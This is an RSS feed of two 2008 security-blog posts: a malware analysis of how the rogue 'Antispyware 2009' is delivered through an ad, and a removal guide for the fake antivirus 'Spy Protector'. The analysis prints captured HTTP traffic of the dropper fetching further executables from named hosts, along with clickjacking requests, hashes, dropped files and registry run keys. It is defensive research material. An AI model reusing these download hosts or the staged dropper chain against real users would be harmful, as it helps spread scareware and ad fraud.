<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>NoVirusThanks Blog &#187; fake av</title>
	<atom:link href="http://blog.novirusthanks.org/tag/fake-av/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.novirusthanks.org</link>
	<description>Security News and Malware Analysis</description>
	<lastBuildDate>Wed, 01 Feb 2012 13:34:38 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>Rogue Antispyware 2009 served through beedly.us ADS</title>
		<link>http://blog.novirusthanks.org/2008/11/rogue-antispyware-2009-served-through-beedlyus-ads/</link>
		<comments>http://blog.novirusthanks.org/2008/11/rogue-antispyware-2009-served-through-beedlyus-ads/#comments</comments>
		<pubDate>Thu, 13 Nov 2008 20:02:37 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Malware Analysis]]></category>
		<category><![CDATA[antispyware2009]]></category>
		<category><![CDATA[fake av]]></category>
		<category><![CDATA[rogue]]></category>
		<category><![CDATA[scam]]></category>

		<guid isPermaLink="false">http://novirusthanks.org/blog/?p=229</guid>
		<description><![CDATA[Today, when I was browsing the beedly.us website, I saw a suspicious ADS link where there was a link to the malicious website proantispyware2009(dot)com, so I started to analyze the link and, below, there is the result: &#160; &#160; So after clicking on the ADS I was redirected to a new sub-domain: &#160; &#160; and [...]]]></description>
			<content:encoded><![CDATA[<p>Today, when I was browsing the beedly.us website, I saw a suspicious ADS link where there was a link to the malicious website proantispyware2009(dot)com, so I started to analyze the link and, below, there is the result:</p>
<p>&nbsp;</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/proantispyware.com_server_on_bleedy_1.gif" alt="Screenshot" title="Pornographic Advertisement Banner" width="530" height="300" /></p>
<p>&nbsp;</p>
<p>So after clicking on the ADS I was redirected to a new sub-domain:</p>
<p>&nbsp;</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/proantispyware.com_server_on_bleedy_2.gif" alt="Screenshot" title="Malicious Subdomain" /></p>
<p>&nbsp;</p>
<p>and if we view the <a href="http://blog.novirusthanks.org/wp-content/uploads/proantispyware.com_server_on_bleedy_3.gif" target="_blank">HTML code</a> is possible to see that if we click in the remove button we will be prompted to download a file named setup_246_3777_.exe that is the real setup file of the rogue security software.</p>
<blockquote>
<p>Report Generated 	13.11.2008 at 20.33.51 (GMT 1)<br />
Filename: 	<b>setup_246_3777_.exe</b><br />
File size: 	112 KB<br />
MD5 Hash: 	E9339F9045368947789EC70739DE4B21<br />
SHA1 Hash: 	DC7B37C1158F5AD4D3E092AFCADE58A5E3FC145B<br />
Application Type:	Executable (EXE) 32bit<br />
Detection Rate:	0 on 23</p>
</p>
</blockquote>
<p>After I executed the .EXE file we started to get some new traffic:</p>
<p>&nbsp;</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/proantispyware.com_server_on_bleedy_4.gif" alt="Screenshot" title="ProAntispyware 2009 setup window" /></p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
</pre></td><td class="code"><pre class="test" style="font-family:monospace;">GET /get/?type=scanner&amp;pin=246&amp;lnd=3777 HTTP/1.1
User-Agent: Installer
Host: dl.storage-antispyware.com
&nbsp;
HTTP/1.1 200 OK
Content-Disposition: attachment; filename=scanner_246_3777_.exe
Content-Transfer-Encoding: binary</pre></td></tr></table></div>

<p>From this traffic we can see that a new file is downloaded:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
</pre></td><td class="code"><pre class="text" style="font-family:monospace;">filename=scanner_246_3777_.exe</pre></td></tr></table></div>

<p>It is the installer for the rogue security software Antispyware 2009! </p>
<blockquote>
<p>Report Generated 	13.11.2008 at 21.24.07 (GMT 1)<br />
Filename: 	<b>scanner_246_3777_.exe</b><br />
File size: 	811 KB<br />
MD5 Hash: 	E0F855C6C5FC93F0A8ED1FE9E702E492<br />
SHA1 Hash: 	77ACC5822A5EBD734075BDF4752EC6F10617050F<br />
Detection Rate:	<font color="red">9</font> on 23</p>
<p>&nbsp;</p>
<p>Antivirus 	Result<br />
a-squared 	<font color="red">Trojan.Fakealert.ads.1!IK</font><br />
Avira AntiVir 	<font color="red">TR/Fakealert.ads.1</font><br />
Avast 	<font color="red">Win32:Spyware-gen [Trj] (0)</font><br />
AVG 	<font color="red">Trojan horse SHeur.CQDP</font><br />
BitDefender 	<font color="red">Trojan.FakeAlert.AKQ</font><br />
ClamAV 	-<br />
Comodo 	-<br />
Dr.Web 	-<br />
Ewido 	-<br />
F-PROT 6 	-<br />
G DATA 	<font color="red">Win32:Spyware-gen [Trj] B</font><br />
IkarusT3 	<font color="red">Trojan.Fakealert.ads.1</font><br />
Kaspersky 	-<br />
McAfee <font color="red"> PWCrack-Winspy trojan</font><br />
NOD32 v3 	-<br />
Norman 	<font color="red">Aggressive commersial W32/AntiVirus2008.TB ()</font><br />
Panda 	-<br />
QuickHeal 	-<br />
Solo Antivirus 	-<br />
Sophos -<br />
TrendMicro 	-<br />
VBA32 	-<br />
VirusBuster 	-</p>
</blockquote>
<p>Next, a new .EXE is downloaded and executed in my system:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
</pre></td><td class="code"><pre class="text" style="font-family:monospace;">GET /mxlivemedia/get_file.php HTTP/1.1
User-Agent: Installer
Host: 85.92.157.141
&nbsp;
GET /mxlivemedia/multi/16.exe HTTP/1.1
User-Agent: Installer
Host: 85.92.157.141</pre></td></tr></table></div>

<p>and the file is:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
</pre></td><td class="code"><pre class="text" style="font-family:monospace;">Location: multi/16.exe</pre></td></tr></table></div>

<blockquote>
<p>Report Generated 	13.11.2008 at 20.39.42 (GMT 1)<br />
Filename: 	<b>16.exe</b><br />
File size: 	598 KB<br />
MD5 Hash: 	9A785CF7901E348C1840925EB5E0C5CC<br />
SHA1 Hash: 	189EEA8FB44360C5E4011BB471D7F1D8F7B3F7AC<br />
Detection Rate:	<font color="red">2</font> on 23</p>
<p>&nbsp;</p>
<p>Antivirus 	Result<br />
a-squared 	-<br />
Avira AntiVir 	-<br />
Avast 	-<br />
AVG 	-<br />
BitDefender 	<font color="red">Generic.Adw.Rotator.FF995C71</font><br />
ClamAV 	-<br />
Comodo 	-<br />
Dr.Web 	-<br />
Ewido 	-<br />
F-PROT 6 	-<br />
G DATA 	-<br />
IkarusT3 	-<br />
Kaspersky 	<font color="red">Trojan-Clicker.Win32.Agent.evi</font><br />
McAfee 	-<br />
NOD32 v3 	-<br />
Norman 	-<br />
Panda 	-<br />
QuickHeal 	-<br />
Solo Antivirus 	-<br />
Sophos 	-<br />
TrendMicro 	-<br />
VBA32 	-<br />
VirusBuster 	-</p>
</blockquote>
<p>After 16.exe is executed we started to get new traffic from new hosts:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
10
</pre></td><td class="code"><pre class="text" style="font-family:monospace;">GET /stat.php?func=install&amp;pid=246&amp;ip=127.0.0.1&amp;landing=3777
Host: int.vbvyu.com
&nbsp;
GET /smb/nsi_install.php?inst_result=success&amp;hwid=xxx
Host: a2.mxlivemedia.com
User-Agent: NSISDL/1.2 (Mozilla)
&nbsp;
GET /bc/nsi_install.php?aff_id=mxlivemedia&amp;inst_result=success&amp;id=xxx
Host: a1.mxlivemedia.com
User-Agent: NSISDL/1.2 (Mozilla)</pre></td></tr></table></div>

<p>and after, <b>IEXPLORE.EXE</b> was executed hidden and the malware started to clickjack the ADS Links hidden!</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
</pre></td><td class="code"><pre class="text" style="font-family:monospace;">GET /servlet/ajrotator/246392/0/vh?z=icm&amp;dim=186262
Referer: http://a1.mxlivemedia.com/bc/ads/728x90/48dcc730ea0ce.html
Host: rotator.its.adjuggler.com
&nbsp;
GET /servlet/ajrotator/7678/0/vh?z=ast&amp;ch=7108&amp;dim=56
Referer: http://a1.mxlivemedia.com/bc/ads/728x90/48e220b3afd5f.html
Host: servedby.topqualityads.net
&nbsp;
GET /bc/ads/300x250/48e220b3afd5f.html
Referer: http://a1.mxlivemedia.com/bc/123kah.php
Host: a1.mxlivemedia.com
&nbsp;
GET /bc/ads/160x600/48e220b3afd5f.html
Referer: http://a1.mxlivemedia.com/bc/123kah.php
Host: a1.mxlivemedia.com
&nbsp;
GET /bc/ads/728x90/48e220b3afd5f.html
Referer: http://a1.mxlivemedia.com/bc/123kah.php
&nbsp;
GET /bc/ads/728x90/48dcc730ea0ce.html
Referer: http://a1.mxlivemedia.com/bc/123kah.php
Host: a1.mxlivemedia.com
&nbsp;
POST /bc/123kah.php
Host: a1.mxlivemedia.com</pre></td></tr></table></div>

<p>After, new files was created in <strong>system32</strong>:</p>
<p>&nbsp;</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/proantispyware.com_server_on_bleedy_9.gif" alt="Screenshot" title="Files created in system32" /></p>
<p>&nbsp;</p>
<blockquote>
<p>Report Generated 	13.11.2008 at 20.50.00 (GMT 1)<br />
Filename: 	<b>msclgkhvhfp.dll</b><br />
File size: 	173 KB<br />
MD5 Hash: 	8532E92178E9126A151E31683D896C31<br />
SHA1 Hash: 	088E2728D8D7D5E185AF231F54D917605F7CED24<br />
Detection Rate:	<font color="red">6</font> on 23</p>
<p>&nbsp;</p>
<p>Antivirus 	Result<br />
a-squared 	<font color="red">Generic.Adw.Rotator!IK</font><br />
Avira AntiVir 	-<br />
Avast 	-<br />
AVG 	-<br />
BitDefender 	<font color="red">Generic.Adw.Rotator.FF995C71</font><br />
ClamAV 	-<br />
Comodo 	-<br />
Dr.Web 	-<br />
Ewido 	-<br />
F-PROT 6 	-<br />
G DATA 	<font color="red">Trojan-Clicker.Win32.Agent.evi A</font><br />
IkarusT3 	<font color="red">Generic.Adw.Rotator</font><br />
Kaspersky 	<font color="red">Trojan-Clicker.Win32.Agent.evi</font><br />
McAfee 	<font color="red">AdClicker-GI trojan</font><br />
NOD32 v3 	-<br />
Norman 	-<br />
Panda 	-<br />
QuickHeal 	-<br />
Solo Antivirus 	-<br />
Sophos 	-<br />
TrendMicro 	-<br />
VBA32 	-<br />
VirusBuster 	-</p>
</blockquote>
<p>Below there are the IEXPLORE.EXE connections:</p>
<p>&nbsp;</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/proantispyware.com_server_on_bleedy_8.gif" alt="Screenshot" title="Connections generated by the process named IEXPLORE.EXE" /></p>
<p>&nbsp;</p>
<p>And finally appeared the image of the rogue security software Antispyware 2009 in the screen:</p>
<p>&nbsp;</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/proantispyware.com_server_on_bleedy_7.gif" alt="Screenshot" title="Antispyware 2009 Image" width="530" height="330" /></p>
<p>&nbsp;</p>
<p>I have created a small summary of the activity of what happened during this analysis:</p>
<p>&nbsp;</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/proantispyware.com_server_on_bleedy_Result.gif" alt="Screenshot" title="Summary" width="530" height="500" /></p>
<p>&nbsp;</p>
<p>And after reading the article of <a href="http://www.sophos.com/security/blog/2008/11/1955.html" target="_blank">SophosLabs</a>  that steve has posted in the comments, I have analyzed with OllyDbg the file setup_246_3777_.exe and below there are some images:</p>
<p>&nbsp;</p>
<p>Original Entry Point:</p>
<p>&nbsp;</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/proantispyware.com_server_on_bleedy_10.gif" alt="Screenshot" title="OEP" width="530" /></p>
<p>&nbsp;</p>
<p>Now, if I follow the address CALL 0040116D, I arrive at the code shown in the image below:</p>
<p>&nbsp;</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/proantispyware.com_server_on_bleedy_12.gif" alt="Screenshot" /></p>
<p>&nbsp;</p>
<p>And now, If I follow the address MOV EDX,00405DEC, I arrive at the code shown in image below, that is full of zero bytes (similar to the analysis of SophosLabs):</p>
<p>&nbsp;</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/proantispyware.com_server_on_bleedy_13.gif" alt="Screenshot" width="530"/></p>
<p>&nbsp;</p>
<p>And for finish, below, I have added some images of the fake alerts shown by Pro Antispyware 2009:</p>
<p>&nbsp;</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/proantispyware.com_server_on_bleedy_14.gif" alt="Fake alert" /></p>
<p>&nbsp;</p>
<p>Make sure to not fall in this scam, if your computer is infected with Antispyware 2009, it is recommended to remove it immediately and to scan your system with <a href="http://www.novirusthanks.org/products/novirusthanks-malware-remover/" target="_blank" title="Free Malware Remover">NoVirusThanks Malware Remover</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.novirusthanks.org/2008/11/rogue-antispyware-2009-served-through-beedlyus-ads/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>How to remove Spy Protector</title>
		<link>http://blog.novirusthanks.org/2008/11/spy-protector-another-rogue-software/</link>
		<comments>http://blog.novirusthanks.org/2008/11/spy-protector-another-rogue-software/#comments</comments>
		<pubDate>Fri, 07 Nov 2008 22:29:57 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Rogue Software]]></category>
		<category><![CDATA[fake av]]></category>
		<category><![CDATA[rogue spyprotector]]></category>
		<category><![CDATA[spy protector]]></category>

		<guid isPermaLink="false">http://novirusthanks.org/blog/?p=189</guid>
		<description><![CDATA[Spy Protector is a rogue security software, it is a false anti-spyware application that is generally installed in the user&#8217;s computer by dangerous trojans (such as Zlob and false video codecs), but it can also be installed manually by the victim. &#160; Once your computer is infected with this parasite, it will immediately displays security [...]]]></description>
			<content:encoded><![CDATA[<p>Spy Protector is a rogue security software, it is a false anti-spyware application that is generally installed in the user&#8217;s computer by dangerous trojans (such as Zlob and false video codecs), but it can also be installed manually by the victim.</p>
<p>&nbsp;</p>
<p>Once your computer is infected with this parasite, it will immediately displays security warnings, alerts and system scans stating that your computer is heavily infected. These warnings are all false and are only displayed to make you think your computer is truly infected and that it is necessary to buy the full version of the software to remove the so-called infections.</p>
<p>&nbsp;</p>
<p>Make sure to not fall in this scam, if your computer is infected with Spy Protector, it is recommended to remove it immediately and to scan your system with a real security software.</p>
<p>&nbsp;</p>
<p><b>Symptoms of infection</b></p>
<p>&nbsp;</p>
<ul>
<li> The process srcss.exe is running in your system</li>
<li> Slow computer performance</li>
<li> Repeated security warnings, alerts and system scans</li>
<li> Web sites that suddenly are shown on your desktop</li>
</ul>
<p>&nbsp;</p>
<p>Malicious web sites and urls:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
</pre></td><td class="code"><pre class="text" style="font-family:monospace;">spy-protector.org</pre></td></tr></table></div>

<p>When the program is executed, it creates the following files:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
10
11
12
</pre></td><td class="code"><pre class="text" style="font-family:monospace;">%ProgramFiles%\Spy Protector
%UserProfile%\Application Data\install.exe
%UserProfile%\Application Data\shellex.dll
%UserProfile%\Application Data\srcss.exe
%UserProfile%\Application Data\SpyProtector
%UserProfile%\Application Data\SpyProtector\SC_Base_new.dat
%UserProfile%\Application Data\SpyProtector\SC_Config.ini
%UserProfile%\Desktop\Spy Protector.lnk
%UserProfile%\Start Menu\Programs\Spy Protector
%UserProfile%\Start Menu\Programs\Spy Protector\Purchase License.url
%UserProfile%\Start Menu\Programs\Spy Protector\Spy Protector.lnk
%UserProfile%\Start Menu\Programs\Spy Protector\Support Page.url</pre></td></tr></table></div>

<p>The program creates the following registry entries:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
</pre></td><td class="code"><pre class="text" style="font-family:monospace;">HKCU\Software\Microsoft\Windows\CurrentVersion\SpyProtector
HKCR\*\shellex\ContextMenuHandlers\Spy Protector
HKCR\Directory\shellex\ContextMenuHandlers\Spy Protector
HKCR\Drive\shellex\ContextMenuHandlers\Spy Protector
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Spy Protector</pre></td></tr></table></div>

<p>How to remove XPShield (manual removal) ?</p>
<p>&nbsp;</p>
<ul>
<li> Kill all the Spy Protector processes</li>
<li> Unregister all the Spy Protector DLLs</li>
<li> Delete all the Spy Protector files</li>
<li> Delete all the Spy Protector registry entries</li>
</ul>
<p>&nbsp;</p>
<p>How to remove Spy Protector (automatic removal) ?</p>
<p>&nbsp;</p>
<ul>
<li> Download and Install <a href="http://www.novirusthanks.org/products/novirusthanks-malware-remover/" target="_blank" title="Free Malware Remover">NoVirusThanks Malware Remover</a></li>
<li> Update the database</li>
<li> Click the button Scan</li>
<li> Delete infected files</li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://blog.novirusthanks.org/2008/11/spy-protector-another-rogue-software/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>

